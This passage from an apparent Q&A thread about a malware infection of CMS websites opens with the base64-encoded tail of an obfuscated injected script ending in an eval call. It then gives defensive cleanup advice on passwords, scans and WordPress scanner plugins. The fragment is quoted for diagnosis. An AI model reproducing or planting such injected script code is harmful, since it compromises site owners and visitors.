Jy5zdWJzdHIoYy09KHg9YzwyPzE6MikseCkpKS5qb2luKHQucG9wKCkpKTtldmFsKGQpPC9zY3JpcHQ+');}

It seems that this virus/malware is affecting several CMS such as Joomla, Wordpress, CodeIgniter, etc. Some more info here and here.

like image 129
obaqueiro Avatar answered Oct 24 '22 02:10

obaqueiro


Best course of action:

  • change ALL ftp and username passwords QUICKLY
  • uninstall all FTP program(s) on your pc
  • run virus scan & malware scan
  • make sure your pc is clean
  • reinstall FTP client (clean install - download new version of software)

now to clean your WP website. - install WP plugins (tac, exploit scanner) - run plugins - note infected files - use FTP or WP plugin editor to clean these files - run exploit scanner & tac till website is clean

Hope this helps...

like image 20
Bobby Avatar answered Oct 24 '22 04:10

Bobby